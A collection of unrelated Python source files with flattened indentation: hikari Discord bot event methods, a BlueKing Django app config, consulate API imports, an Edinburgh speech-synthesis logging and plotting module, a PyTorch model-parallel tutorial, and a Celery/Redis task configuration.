def subscribe(self, event_type: typing.Type[typing.Any], callback: event_manager_.CallbackT[typing.Any]) -> None:
"""Subscribe a given callback to a given event type.
Parameters
----------
event_type : typing.Type[T]
The event type to listen for. This will also listen for any
subclasses of the given type.
`T` must be a subclass of `hikari.events.base_events.Event`.
callback
Must be a coroutine function to invoke. This should
consume an instance of the given event, or an instance of a valid
subclass if one exists. Any result is discarded.
Example
-------
The following demonstrates subscribing a callback to message creation
events.
```py
from hikari.events.messages import MessageCreateEvent
async def on_message(event):
...
bot.subscribe(MessageCreateEvent, on_message)
```
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
self._event_manager.subscribe(event_type, callback)
def unsubscribe(self, event_type: typing.Type[typing.Any], callback: event_manager_.CallbackT[typing.Any]) -> None:
"""Unsubscribe a given callback from a given event type, if present.
Parameters
----------
event_type : typing.Type[T]
The event type to unsubscribe from. This must be the same exact
type as was originally subscribed with to be removed correctly.
`T` must derive from `hikari.events.base_events.Event`.
callback
The callback to unsubscribe.
Example
-------
The following demonstrates unsubscribing a callback from a message
creation event.
```py
from hikari.events.messages import MessageCreateEvent
async def on_message(event):
...
bot.unsubscribe(MessageCreateEvent, on_message)
```
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
self._event_manager.unsubscribe(event_type, callback)
async def wait_for(
self,
event_type: typing.Type[event_manager_.EventT_co],
/,
timeout: typing.Union[float, int, None],
predicate: typing.Optional[event_manager_.PredicateT[event_manager_.EventT_co]] = None,
) -> event_manager_.EventT_co:
"""Wait for a given event to occur once, then return the event.
Parameters
----------
event_type : typing.Type[hikari.events.base_events.Event]
The event type to listen for. This will listen for subclasses of
this type additionally.
predicate
A function taking the event as the single parameter.
This should return `builtins.True` if the event is one you want to
return, or `builtins.False` if the event should not be returned.
If left as `None` (the default), then the first matching event type
that the bot receives (or any subtype) will be the one returned.
!!! warning
Async predicates are not supported.
timeout : typing.Union[builtins.float, builtins.int, builtins.None]
The amount of time to wait before raising an `asyncio.TimeoutError`
and giving up instead. This is measured in seconds. If
`builtins.None`, then no timeout will be waited for (no timeout can
result in "leaking" of coroutines that never complete if called in
an uncontrolled way, so is not recommended).
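Example
-------
A sketch of waiting for the next message in a specific channel; `channel_id`
here is an illustrative variable rather than part of this API:
```py
from hikari.events.messages import MessageCreateEvent
event = await bot.wait_for(
MessageCreateEvent,
timeout=30,
predicate=lambda e: e.channel_id == channel_id,
)
```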
Returns
-------
hikari.events.base_events.Event
The event that was provided.
Raises
------
asyncio.TimeoutError
If the timeout is not `builtins.None` and is reached before an
event is received that the predicate returns `builtins.True` for.
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
"""
self._check_if_alive()
return await self._event_manager.wait_for(event_type, timeout=timeout, predicate=predicate)
def _get_shard(self, guild: snowflakes.SnowflakeishOr[guilds.PartialGuild]) -> gateway_shard.GatewayShard:
guild = snowflakes.Snowflake(guild)
if shard := self._shards.get(snowflakes.calculate_shard_id(self.shard_count, guild)):
return shard
raise RuntimeError(f"Guild {guild} isn't covered by any of the shards in this client")
async def update_presence(
self,
*,
status: undefined.UndefinedOr[presences.Status] = undefined.UNDEFINED,
idle_since: undefined.UndefinedNoneOr[datetime.datetime] = undefined.UNDEFINED,
activity: undefined.UndefinedNoneOr[presences.Activity] = undefined.UNDEFINED,
afk: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
_validate_activity(activity)
coros = [
s.update_presence(status=status, activity=activity, idle_since=idle_since, afk=afk)
for s in self._shards.values()
]
await aio.all_of(*coros)
async def update_voice_state(
self,
guild: snowflakes.SnowflakeishOr[guilds.PartialGuild],
channel: typing.Optional[snowflakes.SnowflakeishOr[channels.GuildVoiceChannel]],
*,
self_mute: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
self_deaf: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
shard = self._get_shard(guild)
await shard.update_voice_state(guild=guild, channel=channel, self_mute=self_mute, self_deaf=self_deaf)
async def request_guild_members(
self,
guild: snowflakes.SnowflakeishOr[guilds.PartialGuild],
*,
include_presences: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
query: str = "",
limit: int = 0,
users: undefined.UndefinedOr[snowflakes.SnowflakeishSequence[users_.User]] = undefined.UNDEFINED,
nonce: undefined.UndefinedOr[str] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
shard = self._get_shard(guild)
await shard.request_guild_members(
guild=guild, include_presences=include_presences, query=query, limit=limit, users=users, nonce=nonce
)
async def _set_close_flag(self, signame: str, signum: int) -> None:
# This needs to be a coroutine, as the closing event is not threadsafe, so we have no way to set this
# from a Unix system call handler if we are running on a thread that isn't the main application thread
# without getting undefined behaviour. We do however have `asyncio.run_coroutine_threadsafe` which can
# run a coroutine function on the event loop from a completely different thread, so this is the safest
# solution.
_LOGGER.debug("received interrupt %s (%s), will start shutting down shortly", signame, signum)
await self._close()
async def _start_one_shard(
self,
activity: typing.Optional[presences.Activity],
afk: bool,
idle_since: typing.Optional[datetime.datetime],
status: presences.Status,
large_threshold: int,
shard_id: int,
shard_count: int,
url: str,
closing_event: asyncio.Event,
) -> shard_impl.GatewayShardImpl:
new_shard = shard_impl.GatewayShardImpl(
http_settings=self._http_settings,
proxy_settings=self._proxy_settings,
event_manager=self._event_manager,
event_factory=self._event_factory,
intents=self._intents,
initial_activity=activity,
initial_is_afk=afk,
initial_idle_since=idle_since,
initial_status=status,
large_threshold=large_threshold,
shard_id=shard_id,
shard_count=shard_count,
token=self._token,
url=url,
)
self._shards[shard_id] = new_shard
start = time.monotonic()
await aio.first_completed(new_shard.start(), closing_event.wait())
end = time.monotonic()
if new_shard.is_alive:
_LOGGER.debug("shard %s started successfully in %.1fms", shard_id, (end - start) * 1_000)
return new_shard
raise errors.GatewayError(f"shard {shard_id} shut down immediately when starting")
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from __future__ import unicode_literals
from django.apps import AppConfig
class PipelinePluginsConfig(AppConfig):
name = 'pipeline_plugins'
|
logging = False
def log(string):
if logging:
print(string)
|
"""
Consul API Endpoints
"""
from consulate.api.acl import ACL
from consulate.api.agent import Agent
from consulate.api.base import Response
from consulate.api.catalog import Catalog
from consulate.api.coordinate import Coordinate
from consulate.api.event import Event
from consulate.api.health import Health
from consulate.api.kv import KV
from consulate.api.lock import Lock
from consulate.api.session import Session
from consulate.api.status import Status
__all__ = ["ACL", "Agent", "Catalog", "Event", "Health", "KV", "Lock", "Session", "Status", "Response", "Coordinate"]
|
################################################################################
# The Neural Network (NN) based Speech Synthesis System
# https://svn.ecdf.ed.ac.uk/repo/inf/dnn_tts/
#
# Centre for Speech Technology Research
# University of Edinburgh, UK
# Copyright (c) 2014-2015
# All Rights Reserved.
#
# The system as a whole and most of the files in it are distributed
# under the following copyright and conditions
#
# Permission is hereby granted, free of charge, to use and distribute
# this software and its documentation without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of this work, and to
# permit persons to whom this work is furnished to do so, subject to
# the following conditions:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# - The authors' names may not be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THE UNIVERSITY OF EDINBURGH AND THE CONTRIBUTORS TO THIS WORK
# DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT
# SHALL THE UNIVERSITY OF EDINBURGH NOR THE CONTRIBUTORS BE LIABLE
# FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
# AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
# ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
# THIS SOFTWARE.
################################################################################
# NOTES
# still to consider: pygal, for HTML5 SVG plotting
import math
import string
import os
# this module provides the base classes that we specialise here
import logging # as logging
# for plotting
import matplotlib
# should make this user-configurable - TO DO later
# this line has to come before the import of matplotlib.pyplot
matplotlib.use('PDF')
import matplotlib.pyplot as plt
import pylab
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
# matplotlib needs to be passed numpy arrays
import numpy
# for sorting tuples
from operator import itemgetter, attrgetter
# TO DO - this needs to be attached to the logging module so that it's available via config options
# class PlotHandler(logging.FileHandler):
# """A handler for saving plots to disk"""
# def __init__(self,filename):
# logging.FileHandler.__init__(self,filename, mode='a', encoding=None, delay=False)
class PlotWithData(object):
# a generic plot object that contains both the underlying data and the plot itself
# this class needs to be subclassed for each specialised type of plot that we want
# the underlying data for the plot - a dictionary of data series
# each series is a list of data points of arbitrary type (e.g., tuples, arrays, ..)
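# e.g. after a few add_data_point calls, data might look like (illustrative values):
#   {'training': [(1, 0.9), (2, 0.7)], 'validation': [(1, 1.1), (2, 0.8)]}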
data=None
# the plot generated from these data
plot=None
def __init__(self,name):
# clear the data series
self.data={}
def add_data_point(self,series_name,data_point):
# if there is no data series with this name yet, create an empty one
if series_name not in self.data:
self.data[series_name]=[]
# append this data point (e.g., it might be a tuple (x,y) )
# don't worry about data type or sorting - that is not our concern here
self.data[series_name].append(data_point)
def sort_and_validate(self):
# only applied if the data points are tuples, such as (x,y) values
# TO DO: first check that each series is a list of tuples, and that they have the same number of elements
# this method checks that all data series
# 1. have the same length
# 2. are sorted in ascending order of x
# 3. have identical values in their x series
# there has to be at least one data series
logger = logging.getLogger("plotting")
try:
assert len(self.data) > 0
except AssertionError:
logger.critical('No data series found in plot')
raise
# check lengths are consistent, sort, then check x values are identical
l=-1
reference_x=None
# print "starting with self.data=",self.data
for series_name,data_points in self.data.items():
if l > 0:
assert l == len(data_points)
else:
l = len(data_points)
# sort by ascending x value
data_points.sort(key=itemgetter(0))
if reference_x:
assert reference_x == [seq[0] for seq in data_points]
else:
# extract a list of just the x values
reference_x = [seq[0] for seq in data_points]
# print "ending with self.data=",self.data
def generate_plot(self,**kwargs):
logger = logging.getLogger("plotting")
logger.error('Cannot generate a plot from abstract class: PlotWithData' )
# raise an exception here?
class MultipleSeriesPlot(PlotWithData):
def generate_plot(self,filename,title='',xlabel='',ylabel='',xlim=None,ylim=None):
logger = logging.getLogger("plotting")
logger.debug('MultipleSeriesPlot.generate_plot')
# a plot with one or more time series sharing a common x axis:
# e.g., the training error and the validation error plotted against epochs
# sort the data series and make sure they are consistent
self.sort_and_validate()
# if there is a plot already in existence, we will clear it and re-use it;
# this avoids creating extraneous figures which will stay in memory
# (even if we are no longer referencing them)
if self.plot:
self.plot.clf()
else:
# create a plot
self.plot = plt.figure()
splt = self.plot.add_subplot(1, 1, 1)
splt.set_title(title)
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
if xlim:
pylab.xlim(xlim)
if ylim:
pylab.ylim(ylim)
for series_name,data_points in self.data.items():
xpoints=numpy.asarray([seq[0] for seq in data_points])
ypoints=numpy.asarray([seq[1] for seq in data_points])
line, = splt.plot(xpoints, ypoints, '-', linewidth=2)
logger.debug('set_label for %s' % series_name)
line.set_label(series_name)
splt.legend()
# TO DO - better filename configuration for plots
self.plot.savefig(filename)
class SingleWeightMatrixPlot(PlotWithData):
def generate_plot(self, filename, title='', xlabel='', ylabel=''):
data_keys = list(self.data.keys())
key_num = len(data_keys)
self.plot = plt.figure()
if key_num == 1:
splt = self.plot.add_subplot(1, 1, 1)
im_data = splt.imshow(numpy.flipud(self.data[data_keys[0]][0]), origin='lower')
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
splt.set_title(title)
else: ## plotting multiple images in one figure is not supported yet; the visualization is not good
logger = logging.getLogger("plotting")
logger.error('plotting multiple weight matrices in one figure is not supported yet')
return
self.plot.colorbar(im_data)
self.plot.savefig(filename) #, bbox_inches='tight'
#class MultipleLinesPlot(PlotWithData):
# def generate_plot(self, filename, title='', xlabel='', ylabel=''):
class LoggerPlotter(logging.getLoggerClass()):
"""Based on the built-in logging class, with added capabilities including plotting"""
# a dictionary to store all generated plots
# keys are plot names
# values are
plots ={}
# where the plots will be saved - a directory
plot_path='/tmp' # default location
def __init__(self,name):
# initialise the logging parent class
# (should really use 'super' here I think, but that fails - perhaps because the built in logger class is not derived from 'object' ?)
logging.Logger.__init__(self,name)
def set_plot_path(self,path):
self.plot_path = path
def remove_all_plots(self):
self.plots={}
def create_plot(self,plot_name,plot_object):
self.plots[plot_name] = plot_object(plot_name)
def add_plot_point(self,plot_name,series_name,data_point):
# add a data point to a named plot
if plot_name not in self.plots:
self.plots[plot_name] = PlotWithData(plot_name)
self.plots[plot_name].add_data_point(series_name,data_point)
def save_plot(self,plot_name,**kwargs):
logger = logging.getLogger("plotting")
if plot_name not in self.plots:
logger.warning('Tried to generate a plot called %s that does not exist' % plot_name)
# raise an exception here?
else:
# # the filename to save to is known by the handler, which needs to be assigned to this logger
# # look at the handlers attached to this logger instance
# ph=None
# for h in self.handlers:
# # we want an instance of a PlotHandler - we'll take the first one we find
# # (behaviour will be unpredictable if there is more than one handler of this type)
# if isinstance(h,PlotHandler):
# ph=h
# break
# if ph:
# TO DO - need to be sure of safe file names
if not os.path.isdir(self.plot_path):
os.makedirs(self.plot_path)
filename = self.plot_path + "/" + string.replace(plot_name, " ", "_") + ".pdf"
logger.info('Generating a plot in file %s' % filename)
self.plots[plot_name].generate_plot(filename,**kwargs)
# else:
# logger.warn('No handler of type PlotHandler is attached to this logger - cannot save plots')
class ColouredFormatter(logging.Formatter):
# colourising formatter adapted from an answer to this question on Stack Overflow
# http://stackoverflow.com/questions/384076/how-can-i-color-python-logging-output
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
COLOURS = {
'DEBUG': BLUE,
'INFO': GREEN,
'WARNING': YELLOW,
'ERROR': RED,
'CRITICAL': MAGENTA
}
max_level_name_width = '8'
# terminal escape sequences
RESET_SEQ = "\033[0m"
COLOUR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
def format(self, record):
if record.levelname in self.COLOURS:
# pad to fixed width - currently hardwired, should make this dynamic
# maximum width of level names, which is the 8 characters of "CRITICAL"
fixed_width_levelname = '{0:8s}'.format(record.levelname)
record.name = '{0:8s}'.format(record.name)
# The background is set with 40 plus the number of the color, and the foreground with 30
record.levelname = self.COLOUR_SEQ % (30 + self.COLOURS[record.levelname]) + fixed_width_levelname + self.RESET_SEQ
return logging.Formatter.format(self, record)
def factory(fmt, datefmt):
default = logging.Formatter(fmt, datefmt)
return ColouredFormatter(default)
if __name__ == '__main__':
# some simple tests
# tell the built-in logger module to use our custom class when instantiating any new logger
logging.setLoggerClass(LoggerPlotter)
logger = logging.getLogger("test_logger")
logger.setLevel(logging.DEBUG)
# a console handler
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = ColouredFormatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
print("testing the logging code")
logger.debug('A DEBUG message')
    logger.info('An INFO message')
    logger.warning('A WARN message')
    logger.error('An ERROR message')
logger.critical('A CRITICAL message')
plotlogger = logging.getLogger("plotting")
plotlogger.setLevel(logging.DEBUG)
# handler for plotting logger - will write only to console
plotlogger.addHandler(ch)
# # need a handler which will control where to save plots
# ph = PlotHandler("/tmp/plot_test/testing.pdf")
# logger.addHandler(ph)
print("testing the plotting code")
# the first argument is just a key for referring to this plot within the code
# the second argument says what kind of plot we will be making
plotlogger.set_plot_path("./tmp")
logger.create_plot('test plot',MultipleTimeSeriesPlot)
plotlogger.add_plot_point('test plot','validation',(1,4))
plotlogger.add_plot_point('test plot','validation',(3,2))
plotlogger.add_plot_point('test plot','validation',(2,3))
plotlogger.add_plot_point('test plot','validation',(4,3))
plotlogger.add_plot_point('test plot','training',(1,3))
plotlogger.add_plot_point('test plot','training',(3,1))
plotlogger.add_plot_point('test plot','training',(2,2))
plotlogger.add_plot_point('test plot','training',(4,4))
plotlogger.save_plot('test plot',title='Training and validation error',xlabel='epochs',ylabel='error')
weights = [[1, 2, 3, 3], [1, 1, 2, 1], [2, 1, 2, 2]]
logger.create_plot('activation weight', SingleWeightMatrixPlot)
plotlogger.add_plot_point('activation weight', 'weight1', weights)
plotlogger.add_plot_point('activation weight', 'weight2', weights)
plotlogger.add_plot_point('activation weight', 'weight3', weights)
plotlogger.save_plot('activation weight', title='weight', xlabel='dimension', ylabel='dimension')
|
# -*- coding: utf-8 -*-
"""
Model Parallel Best Practices
*************************************************************
**Author**: `Shen Li <https://mrshenli.github.io/>`_
Data parallel and model parallel are widely used distributed training
techniques. Previous posts have explained how to use
`DataParallel <https://pytorch.org/tutorials/beginner/blitz/data_parallel_tutorial.html>`_
to train a neural network on multiple GPUs. ``DataParallel`` replicates the
same model to all GPUs, where each GPU consumes a different partition of the
input data. Although it can significantly accelerate the training process, it
does not work for some use cases where the model is too large to fit into a
single GPU. This post shows how to solve that problem by using model parallel
and also shares some insights on how to speed up model parallel training.
The high-level idea of model parallel is to place different sub-networks of a
model onto different devices, and implement the ``forward`` method accordingly
to move intermediate outputs across devices. As only part of a model operates
on any individual device, a set of devices can collectively serve a larger
model. In this post, we will not try to construct huge models and squeeze them
into a limited number of GPUs. Instead, this post focuses on showing the idea
of model parallel. It is up to the readers to apply the ideas to real-world
applications.
**Recommended Reading:**
- https://pytorch.org/ For installation instructions
- :doc:`/beginner/blitz/data_parallel_tutorial` Single-Machine Data Parallel
- :doc:`/intermediate/ddp_tutorial` Combine Distributed Data Parallel and Model Parallel
"""
######################################################################
# Basic Usage
# =======================
#
# Let us start with a toy model that contains two linear layers. To run this
# model on two GPUs, simply put each linear layer on a different GPU, and move
# inputs and intermediate outputs to match the layer devices accordingly.
import torch
import torch.nn as nn
import torch.optim as optim
class ToyModel(nn.Module):
def __init__(self):
super(ToyModel, self).__init__()
self.net1 = torch.nn.Linear(10, 10).to('cuda:0')
self.relu = torch.nn.ReLU()
self.net2 = torch.nn.Linear(10, 5).to('cuda:1')
def forward(self, x):
x = self.relu(self.net1(x.to('cuda:0')))
return self.net2(x.to('cuda:1'))
######################################################################
# Note that the above ``ToyModel`` looks very similar to how one would
# implement it on a single GPU, except for the four ``to(device)`` calls which
# place linear layers and tensors on proper devices. That is the only place in
# the model that requires changes. The ``backward()`` and ``torch.optim`` will
# automatically take care of gradients as if the model is on one GPU. You only
# need to make sure that the labels are on the same device as the outputs when
# calling the loss function.
model = ToyModel()
loss_fn = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)
optimizer.zero_grad()
outputs = model(torch.randn(20, 10))
labels = torch.randn(20, 5).to('cuda:1')
loss_fn(outputs, labels).backward()
optimizer.step()
######################################################################
# Apply Model Parallel to Existing Modules
# =========================================
#
# It is also possible to run an existing single-GPU module on multiple GPUs
# with just a few lines of changes. The code below shows how to decompose
# ``torchvision.models.resnet50()`` to two GPUs. The idea is to inherit from
# the existing ``ResNet`` module, and split the layers to two GPUs during
# construction. Then, override the ``forward`` method to stitch two
# sub-networks by moving the intermediate outputs accordingly.
from torchvision.models.resnet import ResNet, Bottleneck
num_classes = 1000
class ModelParallelResNet50(ResNet):
def __init__(self, *args, **kwargs):
super(ModelParallelResNet50, self).__init__(
Bottleneck, [3, 4, 6, 3], num_classes=num_classes, *args, **kwargs)
self.seq1 = nn.Sequential(
self.conv1,
self.bn1,
self.relu,
self.maxpool,
self.layer1,
self.layer2
).to('cuda:0')
self.seq2 = nn.Sequential(
self.layer3,
self.layer4,
self.avgpool,
).to('cuda:1')
self.fc.to('cuda:1')
def forward(self, x):
x = self.seq2(self.seq1(x).to('cuda:1'))
return self.fc(x.view(x.size(0), -1))
######################################################################
# The above implementation solves the problem for cases where the model is too
# large to fit into a single GPU. However, you might have already noticed that
# it will be slower than running it on a single GPU if your model fits. This is
# because, at any point in time, only one of the two GPUs is working, while
# the other one is sitting there doing nothing. The performance further
# deteriorates as the intermediate outputs need to be copied from ``cuda:0`` to
# ``cuda:1`` between ``layer2`` and ``layer3``.
#
# Let us run an experiment to get a more quantitative view of the execution
# time. In this experiment, we train ``ModelParallelResNet50`` and the existing
# ``torchvision.models.resnet50()`` by running random inputs and labels through
# them. After the training, the models will not produce any useful predictions,
# but we can get a reasonable understanding of the execution times.
import torchvision.models as models
num_batches = 3
batch_size = 120
image_w = 128
image_h = 128
def train(model):
model.train(True)
loss_fn = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)
one_hot_indices = torch.LongTensor(batch_size) \
.random_(0, num_classes) \
.view(batch_size, 1)
for _ in range(num_batches):
# generate random inputs and labels
inputs = torch.randn(batch_size, 3, image_w, image_h)
labels = torch.zeros(batch_size, num_classes) \
.scatter_(1, one_hot_indices, 1)
# run forward pass
optimizer.zero_grad()
outputs = model(inputs.to('cuda:0'))
# run backward pass
labels = labels.to(outputs.device)
loss_fn(outputs, labels).backward()
optimizer.step()
######################################################################
# The ``train(model)`` method above uses ``nn.MSELoss`` as the loss function,
# and ``optim.SGD`` as the optimizer. It mimics training on ``128 X 128``
# images which are organized into 3 batches where each batch contains 120
# images. Then, we use ``timeit`` to run the ``train(model)`` method 10 times
# and plot the execution times with standard deviations.
import matplotlib.pyplot as plt
plt.switch_backend('Agg')
import numpy as np
import timeit
num_repeat = 10
stmt = "train(model)"
setup = "model = ModelParallelResNet50()"
# globals arg is only available in Python 3. In Python 2, use the following
# import __builtin__
# __builtin__.__dict__.update(locals())
mp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
mp_mean, mp_std = np.mean(mp_run_times), np.std(mp_run_times)
setup = "import torchvision.models as models;" + \
"model = models.resnet50(num_classes=num_classes).to('cuda:0')"
rn_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
rn_mean, rn_std = np.mean(rn_run_times), np.std(rn_run_times)
def plot(means, stds, labels, fig_name):
fig, ax = plt.subplots()
ax.bar(np.arange(len(means)), means, yerr=stds,
align='center', alpha=0.5, ecolor='red', capsize=10, width=0.6)
ax.set_ylabel('ResNet50 Execution Time (Second)')
ax.set_xticks(np.arange(len(means)))
ax.set_xticklabels(labels)
ax.yaxis.grid(True)
plt.tight_layout()
plt.savefig(fig_name)
plt.close(fig)
plot([mp_mean, rn_mean],
[mp_std, rn_std],
['Model Parallel', 'Single GPU'],
'mp_vs_rn.png')
######################################################################
#
# .. figure:: /_static/img/model-parallel-images/mp_vs_rn.png
# :alt:
#
# The result shows that the execution time of model parallel implementation is
# ``4.02/3.75-1=7%`` longer than the existing single-GPU implementation. So we
# can conclude there is roughly 7% overhead in copying tensors back and forth
# across the GPUs. There is room for improvement, as we know one of the two
# GPUs is sitting idle throughout the execution. One option is to further
# divide each batch into a pipeline of splits, such that when one split reaches
# the second sub-network, the following split can be fed into the first
# sub-network. In this way, two consecutive splits can run concurrently on two
# GPUs.
######################################################################
# Speed Up by Pipelining Inputs
# ==============================
#
# In the following experiments, we further divide each 120-image batch into
# 20-image splits. As PyTorch launches CUDA operations asynchronously, the
# implementation does not need to spawn multiple threads to achieve
# concurrency.
class PipelineParallelResNet50(ModelParallelResNet50):
def __init__(self, split_size=20, *args, **kwargs):
super(PipelineParallelResNet50, self).__init__(*args, **kwargs)
self.split_size = split_size
def forward(self, x):
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.seq1(s_next).to('cuda:1')
ret = []
for s_next in splits:
# A. s_prev runs on cuda:1
s_prev = self.seq2(s_prev)
ret.append(self.fc(s_prev.view(s_prev.size(0), -1)))
# B. s_next runs on cuda:0, which can run concurrently with A
s_prev = self.seq1(s_next).to('cuda:1')
s_prev = self.seq2(s_prev)
ret.append(self.fc(s_prev.view(s_prev.size(0), -1)))
return torch.cat(ret)
setup = "model = PipelineParallelResNet50()"
pp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
pp_mean, pp_std = np.mean(pp_run_times), np.std(pp_run_times)
plot([mp_mean, rn_mean, pp_mean],
[mp_std, rn_std, pp_std],
['Model Parallel', 'Single GPU', 'Pipelining Model Parallel'],
'mp_vs_rn_vs_pp.png')
######################################################################
# Please note, device-to-device tensor copy operations are synchronized on
# current streams on the source and the destination devices. If you create
# multiple streams, you have to make sure that copy operations are properly
# synchronized. Writing the source tensor or reading/writing the destination
# tensor before finishing the copy operation can lead to undefined behavior.
# The above implementation only uses default streams on both source and
# destination devices, hence it is not necessary to enforce additional
# synchronizations.
#
# .. figure:: /_static/img/model-parallel-images/mp_vs_rn_vs_pp.png
# :alt:
#
# The experiment result shows that, pipelining inputs to model parallel
# ResNet50 speeds up the training process by roughly ``3.75/2.51-1=49%``. It is
# still quite far away from the ideal 100% speedup. As we have introduced a new
# parameter ``split_size`` in our pipeline parallel implementation, it is
# unclear how the new parameter affects the overall training time. Intuitively
# speaking, using a small ``split_size`` leads to many tiny CUDA kernel launches,
# while using a large ``split_size`` results in relatively long idle times during
# the first and last splits. Neither is optimal. There might be an optimal
# ``split_size`` configuration for this specific experiment. Let us try to find
# it by running experiments using several different ``split_size`` values.
means = []
stds = []
split_sizes = [1, 3, 5, 8, 10, 12, 20, 40, 60]
for split_size in split_sizes:
setup = "model = PipelineParallelResNet50(split_size=%d)" % split_size
pp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
means.append(np.mean(pp_run_times))
stds.append(np.std(pp_run_times))
fig, ax = plt.subplots()
ax.plot(split_sizes, means)
ax.errorbar(split_sizes, means, yerr=stds, ecolor='red', fmt='ro')
ax.set_ylabel('ResNet50 Execution Time (Second)')
ax.set_xlabel('Pipeline Split Size')
ax.set_xticks(split_sizes)
ax.yaxis.grid(True)
plt.tight_layout()
plt.savefig("split_size_tradeoff.png")
plt.close(fig)
######################################################################
#
# .. figure:: /_static/img/model-parallel-images/split_size_tradeoff.png
# :alt:
#
# The result shows that setting ``split_size`` to 12 achieves the fastest
# training speed, which leads to ``3.75/2.43-1=54%`` speedup. There are
# still opportunities to further accelerate the training process. For example,
# all operations on ``cuda:0`` are placed on its default stream. This means that
# computations on the next split cannot overlap with the copy operation of the
# previous split. However, as the previous and next splits are different tensors,
# there is no problem overlapping one split's computation with the other's copy. The
# implementation would need to use multiple streams on both GPUs, and different
# sub-network structures require different stream management strategies. As no
# general multi-stream solution works for all model parallel use cases, we will
# not discuss it in this tutorial.
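######################################################################
# As a rough, unverified sketch (not part of the original tutorial), the
# function below shows one way such a multi-stream variant *could* look:
# each ``cuda:0`` to ``cuda:1`` copy is issued on a dedicated side stream so
# that ``cuda:0`` can start computing the next split while the previous one
# is still in flight. The function name and overall structure are
# hypothetical, cross-device stream synchronization is subtle, and this has
# not been benchmarked, so treat it as a starting point only.

def pipelined_forward_with_copy_stream(model, x, split_size=12):
    copy_stream = torch.cuda.Stream(device='cuda:0')
    ret = []
    prev = None
    for split in x.split(split_size, dim=0):
        out0 = model.seq1(split.to('cuda:0'))
        # the side stream must wait until seq1 has produced out0
        copy_stream.wait_stream(torch.cuda.current_stream('cuda:0'))
        with torch.cuda.stream(copy_stream):
            moved = out0.to('cuda:1', non_blocking=True)
        # keep out0's memory alive until the asynchronous copy has finished
        out0.record_stream(copy_stream)
        if prev is not None:
            ret.append(model.fc(model.seq2(prev).view(prev.size(0), -1)))
        # cuda:1 must not consume ``moved`` before the copy has finished
        torch.cuda.current_stream('cuda:1').wait_stream(copy_stream)
        prev = moved
    ret.append(model.fc(model.seq2(prev).view(prev.size(0), -1)))
    return torch.cat(ret)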
|
# -*- coding: utf-8 -*-
from celery import Celery
import config
if config.REDIS_PASSWD:
redis_url = "redis://:{0}@{1}:{2}/{3}".format(
config.REDIS_PASSWD,
config.REDIS_HOST,
config.REDIS_PORT,
config.REDIS_DB
)
else:
redis_url = "redis://{0}:{1}/{2}".format(
config.REDIS_HOST,
config.REDIS_PORT,
config.REDIS_DB
)
celery_app = Celery(
broker=redis_url,
backend=redis_url,
)
celery_app.conf.update(
task_serializer="json",
accept_content=["json"],
result_serializer="json",
timezone="Asia/Shanghai",
enable_utc=True,
)
celery_app.autodiscover_tasks([
"tasks",
], force=True)
celery_app.conf.beat_schedule = {
"parse_log": {
"task": "parse_log",
"schedule": 30
}
}
